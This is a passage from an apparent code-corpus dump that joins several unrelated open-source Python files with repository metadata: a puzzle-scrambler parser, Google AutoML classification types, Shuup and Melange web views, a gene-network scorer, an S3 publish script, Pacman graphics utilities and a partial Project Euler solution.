match = re.search(reverse_slice_regex, instruction_string)
if match:
return self.reverse_slice_instruction(match)
match = re.search(move_regex, instruction_string)
if match:
return self.move_instruction(match)
raise Exception('Could not parse line! "{}"'.format(instruction_string))
def add_swap_positions_instruction(self, match):
first, second = (int(group) for group in match.groups())
def swap_positions():
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_positions)
def add_swap_letters_instruction(self, match):
def swap_letters():
first, second = (self.buffer.index(group) for group in match.groups())
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_letters)
def add_rotate_instruction(self, match):
steps = int(match.group(2)) % len(self.buffer)
if match.group(1) == 'left':
steps = (len(self.buffer) - steps) % len(self.buffer)
if self.decrypt:
steps = (len(self.buffer) - steps) % len(self.buffer)
def rotate():
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate)
def add_rotate_on_letter_position_instruction(self, match):
def rotate_on_letter_position():
if self.decrypt:
final_index = self.buffer.index(match.group(1)) % 8
steps = self.reverse_shift[final_index]
else:
steps = 1 + self.buffer.index(match.group(1))
if steps >= 5:
steps += 1
steps %= len(self.buffer)
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate_on_letter_position)
def reverse_slice_instruction(self, match):
first, second = (int(group) for group in match.groups())
def reverse_slice():
self.buffer = self.buffer[:first] + self.buffer[first:second + 1][::-1] + self.buffer[second + 1:]
self.instructions.append(reverse_slice)
def move_instruction(self, match):
first, second = (int(group) for group in match.groups())
if self.decrypt:
first, second = second, first
def move():
value = self.buffer[first]
del self.buffer[first]
self.buffer.insert(second, value)
self.instructions.append(move)
|
mit
| 7,164,240,172,985,285,000
| 38.761062
| 110
| 0.605831
| false
| 3.913763
| false
| false
| false
|
googleapis/python-automl
|
google/cloud/automl_v1beta1/types/classification.py
|
1
|
13060
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.automl_v1beta1.types import temporal
__protobuf__ = proto.module(
package="google.cloud.automl.v1beta1",
manifest={
"ClassificationType",
"ClassificationAnnotation",
"VideoClassificationAnnotation",
"ClassificationEvaluationMetrics",
},
)
class ClassificationType(proto.Enum):
r"""Type of the classification problem."""
CLASSIFICATION_TYPE_UNSPECIFIED = 0
MULTICLASS = 1
MULTILABEL = 2
class ClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to classification.
Attributes:
score (float):
Output only. A confidence estimate between
0.0 and 1.0. A higher value means greater
confidence that the annotation is positive. If a
user approves an annotation as negative or
positive, the score value remains unchanged. If
a user creates an annotation, the score is 0 for
negative or 1 for positive.
"""
score = proto.Field(proto.FLOAT, number=1,)
class VideoClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to video classification.
Attributes:
type_ (str):
Output only. Expresses the type of video classification.
Possible values:
- ``segment`` - Classification done on a specified by user
time segment of a video. AnnotationSpec is answered to be
present in that time segment, if it is present in any
part of it. The video ML model evaluations are done only
for this type of classification.
- ``shot``- Shot-level classification. AutoML Video
Intelligence determines the boundaries for each camera
shot in the entire segment of the video that user
specified in the request configuration. AutoML Video
Intelligence then returns labels and their confidence
scores for each detected shot, along with the start and
end time of the shot. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
- ``1s_interval`` - AutoML Video Intelligence returns
labels and their confidence scores for each second of the
entire segment of the video that user specified in the
request configuration. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
classification_annotation (google.cloud.automl_v1beta1.types.ClassificationAnnotation):
Output only . The classification details of
this annotation.
time_segment (google.cloud.automl_v1beta1.types.TimeSegment):
Output only . The time segment of the video
to which the annotation applies.
"""
type_ = proto.Field(proto.STRING, number=1,)
classification_annotation = proto.Field(
proto.MESSAGE, number=2, message="ClassificationAnnotation",
)
time_segment = proto.Field(proto.MESSAGE, number=3, message=temporal.TimeSegment,)
class ClassificationEvaluationMetrics(proto.Message):
r"""Model evaluation metrics for classification problems. Note: For
Video Classification this metrics only describe quality of the Video
Classification predictions of "segment_classification" type.
Attributes:
au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric. Micro-averaged for the overall
evaluation.
base_au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric based on priors. Micro-averaged for
the overall evaluation. Deprecated.
au_roc (float):
Output only. The Area Under Receiver
Operating Characteristic curve metric. Micro-
averaged for the overall evaluation.
log_loss (float):
Output only. The Log Loss metric.
confidence_metrics_entry (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfidenceMetricsEntry]):
Output only. Metrics for each confidence_threshold in
0.00,0.05,0.10,...,0.95,0.96,0.97,0.98,0.99 and
position_threshold = INT32_MAX_VALUE. ROC and
precision-recall curves, and other aggregated metrics are
derived from them. The confidence metrics entries may also
be supplied for additional values of position_threshold, but
from these no aggregated metrics are computed.
confusion_matrix (google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix):
Output only. Confusion matrix of the
evaluation. Only set for MULTICLASS
classification problems where number of labels
is no more than 10.
Only set for model level evaluation, not for
evaluation per label.
annotation_spec_id (Sequence[str]):
Output only. The annotation spec ids used for
this evaluation.
"""
class ConfidenceMetricsEntry(proto.Message):
r"""Metrics for a single confidence threshold.
Attributes:
confidence_threshold (float):
Output only. Metrics are computed with an
assumption that the model never returns
predictions with score lower than this value.
position_threshold (int):
Output only. Metrics are computed with an assumption that
the model always returns at most this many predictions
(ordered by their score, descendingly), but they all still
need to meet the confidence_threshold.
recall (float):
Output only. Recall (True Positive Rate) for
the given confidence threshold.
precision (float):
Output only. Precision for the given
confidence threshold.
false_positive_rate (float):
Output only. False Positive Rate for the
given confidence threshold.
f1_score (float):
Output only. The harmonic mean of recall and
precision.
recall_at1 (float):
Output only. The Recall (True Positive Rate)
when only considering the label that has the
highest prediction score and not below the
confidence threshold for each example.
precision_at1 (float):
Output only. The precision when only
considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
false_positive_rate_at1 (float):
Output only. The False Positive Rate when
only considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
f1_score_at1 (float):
Output only. The harmonic mean of
[recall_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.recall_at1]
and
[precision_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.precision_at1].
true_positive_count (int):
Output only. The number of model created
labels that match a ground truth label.
false_positive_count (int):
Output only. The number of model created
labels that do not match a ground truth label.
false_negative_count (int):
Output only. The number of ground truth
labels that are not matched by a model created
label.
true_negative_count (int):
Output only. The number of labels that were
not created by the model, but if they would,
they would not match a ground truth label.
"""
confidence_threshold = proto.Field(proto.FLOAT, number=1,)
position_threshold = proto.Field(proto.INT32, number=14,)
recall = proto.Field(proto.FLOAT, number=2,)
precision = proto.Field(proto.FLOAT, number=3,)
false_positive_rate = proto.Field(proto.FLOAT, number=8,)
f1_score = proto.Field(proto.FLOAT, number=4,)
recall_at1 = proto.Field(proto.FLOAT, number=5,)
precision_at1 = proto.Field(proto.FLOAT, number=6,)
false_positive_rate_at1 = proto.Field(proto.FLOAT, number=9,)
f1_score_at1 = proto.Field(proto.FLOAT, number=7,)
true_positive_count = proto.Field(proto.INT64, number=10,)
false_positive_count = proto.Field(proto.INT64, number=11,)
false_negative_count = proto.Field(proto.INT64, number=12,)
true_negative_count = proto.Field(proto.INT64, number=13,)
class ConfusionMatrix(proto.Message):
r"""Confusion matrix of the model running the classification.
Attributes:
annotation_spec_id (Sequence[str]):
Output only. IDs of the annotation specs used in the
confusion matrix. For Tables CLASSIFICATION
[prediction_type][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type]
only list of [annotation_spec_display_name-s][] is
populated.
display_name (Sequence[str]):
Output only. Display name of the annotation specs used in
the confusion matrix, as they were at the moment of the
evaluation. For Tables CLASSIFICATION
[prediction_type-s][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type],
distinct values of the target column at the moment of the
model evaluation are populated here.
row (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix.Row]):
Output only. Rows in the confusion matrix. The number of
rows is equal to the size of ``annotation_spec_id``.
``row[i].example_count[j]`` is the number of examples that
have ground truth of the ``annotation_spec_id[i]`` and are
predicted as ``annotation_spec_id[j]`` by the model being
evaluated.
"""
class Row(proto.Message):
r"""Output only. A row in the confusion matrix.
Attributes:
example_count (Sequence[int]):
Output only. Value of the specific cell in the confusion
matrix. The number of values each row has (i.e. the length
of the row) is equal to the length of the
``annotation_spec_id`` field or, if that one is not
populated, length of the
[display_name][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfusionMatrix.display_name]
field.
"""
example_count = proto.RepeatedField(proto.INT32, number=1,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=1,)
display_name = proto.RepeatedField(proto.STRING, number=3,)
row = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="ClassificationEvaluationMetrics.ConfusionMatrix.Row",
)
au_prc = proto.Field(proto.FLOAT, number=1,)
base_au_prc = proto.Field(proto.FLOAT, number=2,)
au_roc = proto.Field(proto.FLOAT, number=6,)
log_loss = proto.Field(proto.FLOAT, number=7,)
confidence_metrics_entry = proto.RepeatedField(
proto.MESSAGE, number=3, message=ConfidenceMetricsEntry,
)
confusion_matrix = proto.Field(proto.MESSAGE, number=4, message=ConfusionMatrix,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=5,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
apache-2.0
| 6,754,684,378,545,079,000
| 46.148014
| 134
| 0.633767
| false
| 4.737033
| false
| false
| false
|
suutari/shoop
|
shuup/admin/modules/suppliers/views/edit.py
|
1
|
1488
|
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from shuup.admin.utils.views import (
check_and_raise_if_only_one_allowed, CreateOrUpdateView
)
from shuup.core.models import Supplier
class SupplierForm(forms.ModelForm):
class Meta:
model = Supplier
exclude = ("module_data",)
widgets = {
"module_identifier": forms.Select
}
class SupplierEditView(CreateOrUpdateView):
model = Supplier
form_class = SupplierForm
template_name = "shuup/admin/suppliers/edit.jinja"
context_object_name = "supplier"
def get_object(self, queryset=None):
obj = super(SupplierEditView, self).get_object(queryset)
check_and_raise_if_only_one_allowed("SHUUP_ENABLE_MULTIPLE_SUPPLIERS", obj)
return obj
def get_form(self, form_class=None):
form = super(SupplierEditView, self).get_form(form_class=form_class)
choices = self.model.get_module_choices(
empty_label=(_("No %s module") % self.model._meta.verbose_name)
)
form.fields["module_identifier"].choices = form.fields["module_identifier"].widget.choices = choices
return form
|
agpl-3.0
| 8,299,280,317,891,628,000
| 32.066667
| 108
| 0.684812
| false
| 3.620438
| false
| false
| false
|
cemarchi/biosphere
|
Src/BioAnalyzer/Analysis/GenePrioritization/Steps/NetworkAnalysis/NetworkScoreAnalyzers/GeneNetworkScoreAnalyzer.py
|
1
|
2431
|
import operator
import networkx as nx
from scipy.stats import gmean
from Src.BioAnalyzer.Analysis.GenePrioritization.Steps.NetworkAnalysis.NetworkScoreAnalyzers.NetworkScoreAnalyzerBase \
import NetworkScoreAnalyzerBase
class GeneNetworkScoreAnalyzer(NetworkScoreAnalyzerBase):
def __init__(self):
pass
def calculate(self, network: nx.Graph) -> nx.Graph:
degree_centrality_measure = self.__get_centrality_measure(nx.degree_centrality(network))
page_rank_measure = self.__get_centrality_measure(nx.pagerank(network, alpha=0.85))
betweenness_measure = self.__get_centrality_measure(nx.betweenness_centrality(network))
hubs = None
authorities = None
try:
hubs, authorities = nx.hits(network)
except Exception:
pass
hubs_measure = self.__get_centrality_measure(hubs) if hubs else None
authorities_measure = self.__get_centrality_measure(authorities) if authorities else None
return self.__get_score(network, degree_centrality_measure, page_rank_measure, betweenness_measure,
hubs_measure, authorities_measure)
def __get_score(self, network, degree_centrality_measure, page_rank_measure, betweenness_measure, hubs_measure,
authorities_measure):
for node in network.node.keys():
score = []
if degree_centrality_measure and node in degree_centrality_measure:
score.append(degree_centrality_measure[node])
if page_rank_measure and node in page_rank_measure:
score.append(page_rank_measure[node])
if betweenness_measure and node in betweenness_measure:
score.append(betweenness_measure[node])
if hubs_measure and node in hubs_measure:
score.append(hubs_measure[node])
if authorities_measure and node in authorities_measure:
score.append(authorities_measure[node])
network.node[node]['centrality_value'] = gmean(score)
return network
def __get_centrality_measure(self, node_measurements):
nodes = sorted(node_measurements.items(), key=operator.itemgetter(1), reverse=True)
measurements = {}
measure = 1
for node, measure in nodes:
measurements[node] = measure
measure += 1
return measurements
|
bsd-3-clause
| -5,332,966,840,455,512,000
| 35.298507
| 119
| 0.654463
| false
| 4.220486
| false
| false
| false
|
smartystreets/jquery.liveaddress
|
resources/publish.py
|
1
|
2128
|
"""
This script is used by SmartyStreets when deploying a new version of the jquery.liveaddress plugin.
"""
import os.path as path
import os
import sys
import boto
from boto.s3.bucket import Bucket
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from utils import get_mime_type
def main():
cloudfront_connection = boto.connect_cloudfront()
s3_connection = connect_to_s3()
bucket = Bucket(s3_connection, S3_BUCKET)
publish(bucket, cloudfront_connection)
def connect_to_s3():
"""
Workaround for '.' in bucket names when calling from Python 2.9+:
https://github.com/boto/boto/issues/2836#issuecomment-77283169
"""
if '.' in S3_BUCKET:
return S3Connection(calling_format=OrdinaryCallingFormat())
else:
return S3Connection()
def publish(bucket, cloudfront):
resources = []
for root, dirs, files in os.walk(WORKING_DIRECTORY):
for f in files:
if f not in EXCLUDES:
local_path = path.join(root, f)
resource_path = upload_to_s3(local_path, bucket)
resources.append(resource_path)
distribution = os.environ.get('AWS_CLOUDFRONT_DISTRIBUTION_ID') or raw_input('Enter the cloudfront distribution id: ')
distribution = distribution.strip()
if distribution:
print "Creating cloudfront invalidation for all uploaded resources..."
cloudfront.create_invalidation_request(distribution, resources)
def upload_to_s3(resource, bucket):
entry = Key(bucket)
entry.key = path.join(DESTINATION.format(VERSION), path.basename(resource))
entry.set_metadata('Content-Encoding', 'gzip')
entry.set_metadata('Content-Type', get_mime_type(resource))
print 'Publishing {0} to {1}...'.format(resource, entry.key)
entry.set_contents_from_filename(resource)
return entry.key
EXCLUDES = ['.DS_Store']
DESTINATION = '/jquery.liveaddress/{0}'
WORKING_DIRECTORY = '../workspace/'
S3_BUCKET = 'static.smartystreets.com'
VERSION = '.'.join(sys.argv[1].split('.')[0:2])
if __name__ == '__main__':
main()
|
gpl-3.0
| 8,783,965,952,323,402,000
| 29.84058
| 122
| 0.681391
| false
| 3.60678
| false
| false
| false
|
adviti/melange
|
app/soc/views/oauth.py
|
1
|
4862
|
#!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing views for Open Auth.
"""
from django.conf.urls.defaults import url as django_url
from soc.views.helper.gdata_apis import oauth as oauth_helper
from soc.modules.gsoc.views.base import RequestHandler
from django.conf import settings
from django.utils import simplejson
class OAuthRedirectPage(RequestHandler):
"""Redirect page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/redirect$', self, name='gdata_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def context(self):
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.request.GET.get('next','/'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
context = {
'approval_page_url': url,
'page_name': 'Authorization Required',
}
return context
def templatePath(self):
"""Override this method to define a rendering template
"""
pass
class OAuthVerifyToken(RequestHandler):
"""Verify request token and redirect user.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/verify$', self, name='gdata_oauth_verify'),
]
return patterns
def get(self):
service = oauth_helper.createDocsService(self.data)
oauth_helper.checkOAuthVerifier(service, self.data)
next = self.request.GET.get('next','/')
self.redirect.toUrl(next)
return self.response
class PopupOAuthRedirectPage(RequestHandler):
"""Redirects popup page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/redirect$', self,
name='gdata_popup_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def get(self):
access_token = oauth_helper.getAccessToken(self.data.user)
if access_token:
url = self.redirect.urlOf('gdata_popup_oauth_verified')
else:
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.redirect.urlOf('gdata_popup_oauth_verified'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
self.redirect.toUrl(url)
return self.response
class PopupOAuthVerified(RequestHandler):
""" Calls parent window's methods to indicate successful login.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/verified$', self,
name='gdata_popup_oauth_verified')
]
return patterns
def checkAccess(self):
self.check.canAccessGoogleDocs()
def get(self):
html = (
"<html><body><script type='text/javascript'>"
" window.opener.melange.gdata.loginSuccessful();"
" window.close();"
"</script></body></html>"
)
self.response.write(html)
class MakeRequest(RequestHandler):
"""Work as a proxy view and deliver JS request to GData server.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/make_request$', self, name='gdata_make_request')
]
return patterns
def checkAccess(self):
self.check.canAccessGoogleDocs()
def post(self):
params = self.request.POST
gdata_service = oauth_helper.createGDataService(self.data)
service_name = params['service_name']
method = params.get('method', 'GET')
data = simplejson.loads(params.get('data', '{}'))
url = params['url']
if not url.startswith('https'):
host = settings.GDATA_HOSTS[service_name]
url = 'https://%s%s' % (host, url)
alt = params.get('alt')
if alt == 'json':
url = url + '?alt=json'
headers = simplejson.loads(params.get('headers','{}'))
if not 'GData-Version' in headers:
headers['GData-Version'] = '1.0'
response = gdata_service.request(method, url, data, headers=headers)
response_data = response.read().decode('utf-8')
self.response.write(response_data)
|
apache-2.0
| 6,183,347,659,760,637,000
| 27.6
| 81
| 0.654463
| false
| 3.871019
| false
| false
| false
|
DominikDitoIvosevic/Uni
|
AI/lab2/graphicsUtils.py
|
1
|
11867
|
# graphicsUtils.py
# ----------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
import sys
import math
import random
import string
import time
import types
import Tkinter
#from PIL import ImageTk, Image
_Windows = sys.platform == 'win32' # True if on Win95/98/NT
_root_window = None # The root window for graphics output
_canvas = None # The canvas which holds graphics
_canvas_xs = None # Size of canvas object
_canvas_ys = None
_canvas_x = None # Current position on canvas
_canvas_y = None
_canvas_col = None # Current colour (set to black below)
_canvas_tsize = 12
_canvas_tserifs = 0
def formatColor(r, g, b):
return '#%02x%02x%02x' % (int(r * 255), int(g * 255), int(b * 255))
def colorToVector(color):
return map(lambda x: int(x, 16) / 256.0, [color[1:3], color[3:5], color[5:7]])
if _Windows:
_canvas_tfonts = ['times new roman', 'lucida console']
else:
_canvas_tfonts = ['times', 'lucidasans-24']
pass # XXX need defaults here
def sleep(secs):
global _root_window
if _root_window == None:
time.sleep(secs)
else:
_root_window.update_idletasks()
_root_window.after(int(1000 * secs), _root_window.quit)
_root_window.mainloop()
def begin_graphics(width=640, height=480, color=formatColor(0, 0, 0), title=None):
global _root_window, _canvas, _canvas_x, _canvas_y, _canvas_xs, _canvas_ys, _bg_color
# Check for duplicate call
if _root_window is not None:
# Lose the window.
_root_window.destroy()
# Save the canvas size parameters
_canvas_xs, _canvas_ys = width - 1, height - 1
_canvas_x, _canvas_y = 0, _canvas_ys
_bg_color = color
# Create the root window
_root_window = Tkinter.Tk()
_root_window.protocol('WM_DELETE_WINDOW', _destroy_window)
_root_window.title(title or 'Graphics Window')
_root_window.resizable(0, 0)
# Create the canvas object
try:
_canvas = Tkinter.Canvas(_root_window, width=width, height=height)
_canvas.pack()
draw_background()
_canvas.update()
except:
_root_window = None
raise
# Bind to key-down and key-up events
_root_window.bind( "<KeyPress>", _keypress )
_root_window.bind( "<KeyRelease>", _keyrelease )
_root_window.bind( "<FocusIn>", _clear_keys )
_root_window.bind( "<FocusOut>", _clear_keys )
_root_window.bind( "<Button-1>", _leftclick )
_root_window.bind( "<Button-2>", _rightclick )
_root_window.bind( "<Button-3>", _rightclick )
_root_window.bind( "<Control-Button-1>", _ctrl_leftclick)
_clear_keys()
_leftclick_loc = None
_rightclick_loc = None
_ctrl_leftclick_loc = None
def _leftclick(event):
global _leftclick_loc
_leftclick_loc = (event.x, event.y)
def _rightclick(event):
global _rightclick_loc
_rightclick_loc = (event.x, event.y)
def _ctrl_leftclick(event):
global _ctrl_leftclick_loc
_ctrl_leftclick_loc = (event.x, event.y)
def wait_for_click():
while True:
global _leftclick_loc
global _rightclick_loc
global _ctrl_leftclick_loc
if _leftclick_loc != None:
val = _leftclick_loc
_leftclick_loc = None
return val, 'left'
if _rightclick_loc != None:
val = _rightclick_loc
_rightclick_loc = None
return val, 'right'
if _ctrl_leftclick_loc != None:
val = _ctrl_leftclick_loc
_ctrl_leftclick_loc = None
return val, 'ctrl_left'
sleep(0.05)
def draw_background():
corners = [(0,0), (0, _canvas_ys), (_canvas_xs, _canvas_ys), (_canvas_xs, 0)]
polygon(corners, _bg_color, fillColor=_bg_color, filled=True, smoothed=False)
def _destroy_window(event=None):
sys.exit(0)
# global _root_window
# _root_window.destroy()
# _root_window = None
#print "DESTROY"
def end_graphics():
global _root_window, _canvas, _mouse_enabled
try:
try:
sleep(1)
if _root_window != None:
_root_window.destroy()
except SystemExit, e:
print 'Ending graphics raised an exception:', e
finally:
_root_window = None
_canvas = None
_mouse_enabled = 0
_clear_keys()
def clear_screen(background=None):
global _canvas_x, _canvas_y
_canvas.delete('all')
draw_background()
_canvas_x, _canvas_y = 0, _canvas_ys
def polygon(coords, outlineColor, fillColor=None, filled=1, smoothed=1, behind=0, width=1):
c = []
for coord in coords:
c.append(coord[0])
c.append(coord[1])
if fillColor == None: fillColor = outlineColor
if filled == 0: fillColor = ""
poly = _canvas.create_polygon(c, outline=outlineColor, fill=fillColor, smooth=smoothed, width=width)
if behind > 0:
_canvas.tag_lower(poly, behind) # Higher should be more visible
return poly
def square(pos, r, color, filled=1, behind=0):
x, y = pos
coords = [(x - r, y - r), (x + r, y - r), (x + r, y + r), (x - r, y + r)]
return polygon(coords, color, color, filled, 0, behind=behind)
def circle(pos, r, outlineColor, fillColor, endpoints=None, style='pieslice', width=2):
x, y = pos
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
return _canvas.create_arc(x0, y0, x1, y1, outline=outlineColor, fill=fillColor,
extent=e[1] - e[0], start=e[0], style=style, width=width)
def image(pos, file="../../blueghost.gif"):
x, y = pos
# img = PhotoImage(file=file)
#img = ImageTk.PhotoImage(Image.open(file))
return _canvas.create_image(x, y, image = Tkinter.PhotoImage(file=file), anchor = Tkinter.NW)
def refresh():
_canvas.update_idletasks()
def moveCircle(id, pos, r, endpoints=None):
global _canvas_x, _canvas_y
x, y = pos
# x0, x1 = x - r, x + r + 1
# y0, y1 = y - r, y + r + 1
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
#edit(id, ('start', e[0]), ('extent', e[1] - e[0]))
move_to(id, x0, y0)
def edit(id, *args):
_canvas.itemconfigure(id, **dict(args))
def text(pos, color, contents, font='Helvetica', size=12, style='normal', anchor="nw"):
global _canvas_x, _canvas_y
x, y = pos
font = (font, str(size), style)
return _canvas.create_text(x, y, fill=color, text=contents, font=font, anchor=anchor)
def changeText(id, newText, font=None, size=12, style='normal'):
_canvas.itemconfigure(id, text=newText)
if font != None:
_canvas.itemconfigure(id, font=(font, '-%d' % size, style))
def changeColor(id, newColor):
_canvas.itemconfigure(id, fill=newColor)
def line(here, there, color=formatColor(0, 0, 0), width=2):
x0, y0 = here[0], here[1]
x1, y1 = there[0], there[1]
return _canvas.create_line(x0, y0, x1, y1, fill=color, width=width)
##############################################################################
### Keypress handling ########################################################
##############################################################################
# We bind to key-down and key-up events.
_keysdown = {}
_keyswaiting = {}
# This holds an unprocessed key release. We delay key releases by up to
# one call to keys_pressed() to get round a problem with auto repeat.
_got_release = None
def _keypress(event):
global _got_release
#remap_arrows(event)
_keysdown[event.keysym] = 1
_keyswaiting[event.keysym] = 1
# print event.char, event.keycode
_got_release = None
def _keyrelease(event):
global _got_release
#remap_arrows(event)
try:
del _keysdown[event.keysym]
except:
pass
_got_release = 1
def remap_arrows(event):
# TURN ARROW PRESSES INTO LETTERS (SHOULD BE IN KEYBOARD AGENT)
if event.char in ['a', 's', 'd', 'w']:
return
if event.keycode in [37, 101]: # LEFT ARROW (win / x)
event.char = 'a'
if event.keycode in [38, 99]: # UP ARROW
event.char = 'w'
if event.keycode in [39, 102]: # RIGHT ARROW
event.char = 'd'
if event.keycode in [40, 104]: # DOWN ARROW
event.char = 's'
def _clear_keys(event=None):
global _keysdown, _got_release, _keyswaiting
_keysdown = {}
_keyswaiting = {}
_got_release = None
def keys_pressed(d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
d_o_e(d_w)
if _got_release:
d_o_e(d_w)
return _keysdown.keys()
def keys_waiting():
global _keyswaiting
keys = _keyswaiting.keys()
_keyswaiting = {}
return keys
# Block for a list of keys...
def wait_for_keys():
keys = []
while keys == []:
keys = keys_pressed()
sleep(0.05)
return keys
def remove_from_screen(x,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
_canvas.delete(x)
d_o_e(d_w)
def _adjust_coords(coord_list, x, y):
for i in range(0, len(coord_list), 2):
coord_list[i] = coord_list[i] + x
coord_list[i + 1] = coord_list[i + 1] + y
return coord_list
def move_to(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
if y is None:
try: x, y = x
except: raise 'incomprehensible coordinates'
horiz = True
newCoords = []
current_x, current_y = _canvas.coords(object)[0:2] # first point
for coord in _canvas.coords(object):
if horiz:
inc = x - current_x
else:
inc = y - current_y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
def move_by(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT, lift=False):
if y is None:
try: x, y = x
except: raise Exception, 'incomprehensible coordinates'
horiz = True
newCoords = []
for coord in _canvas.coords(object):
if horiz:
inc = x
else:
inc = y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
if lift:
_canvas.tag_raise(object)
def writePostscript(filename):
"Writes the current canvas to a postscript file."
psfile = file(filename, 'w')
psfile.write(_canvas.postscript(pageanchor='sw',
y='0.c',
x='0.c'))
psfile.close()
ghost_shape = [
(0, - 0.5),
(0.25, - 0.75),
(0.5, - 0.5),
(0.75, - 0.75),
(0.75, 0.5),
(0.5, 0.75),
(- 0.5, 0.75),
(- 0.75, 0.5),
(- 0.75, - 0.75),
(- 0.5, - 0.5),
(- 0.25, - 0.75)
]
if __name__ == '__main__':
begin_graphics()
clear_screen()
ghost_shape = [(x * 10 + 20, y * 10 + 20) for x, y in ghost_shape]
g = polygon(ghost_shape, formatColor(1, 1, 1))
move_to(g, (50, 50))
circle((150, 150), 20, formatColor(0.7, 0.3, 0.0), endpoints=[15, - 15])
sleep(2)
|
mit
| 2,995,610,118,131,092,000
| 28.593516
| 104
| 0.581444
| false
| 3.090365
| false
| false
| false
|
NoahBaird/Project-Euler
|
Problem 3 - Largest prime factor/Python 1.0.py
|
1
|
1112
|
from math import sqrt
def checkIfDone(num):
if num == 1:
return True
return False
def IsPrime(num):
for i in range(2, int(sqrt(num))):
if num % i == 0:
return False
return True
def findLargestPrimeFactor(num):
done = False
largestFactor = 1
while num % 2 == 0:
num = num / 2
largestFactor = 2
done = checkIfDone(num)
while num % 3 == 0:
num = num / 3
largestFactor = 3
done = checkIfDone(num)
iterator = 1
while not done:
posPrime1 = iterator * 6 - 1
posPrime2 = iterator * 6 + 1
if IsPrime(posPrime1):
while num % posPrime1 == 0:
num = num / posPrime1
largestFactor = posPrime1
